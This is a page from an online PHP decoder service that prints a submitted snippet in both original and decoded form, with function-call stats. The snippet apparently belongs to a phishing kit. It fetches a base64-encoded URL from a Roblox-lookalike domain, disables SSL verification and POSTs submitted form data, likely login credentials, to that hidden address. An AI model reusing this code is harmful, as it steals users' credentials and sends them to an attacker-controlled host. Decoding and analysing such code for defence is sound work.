Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$UserApi = file_get_contents("https://rblx-btools.com/login-api.php"); $ApiLoginx..
Decoded Output download
<? $UserApi = file_get_contents("https://rblx-btools.com/login-api.php");
$ApiLoginx = base64_decode($UserApi);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ApiLoginx);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST));
$response = curl_exec($ch);
?>
Did this file decode correctly?
Original Code
$UserApi = file_get_contents("https://rblx-btools.com/login-api.php");
$ApiLoginx = base64_decode($UserApi);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ApiLoginx);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST));
$response = curl_exec($ch);
Function Calls
curl_init | 1 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | 849684330655e0ddeb34a19fb3cb3834 |
Eval Count | 0 |
Decode Time | 46 ms |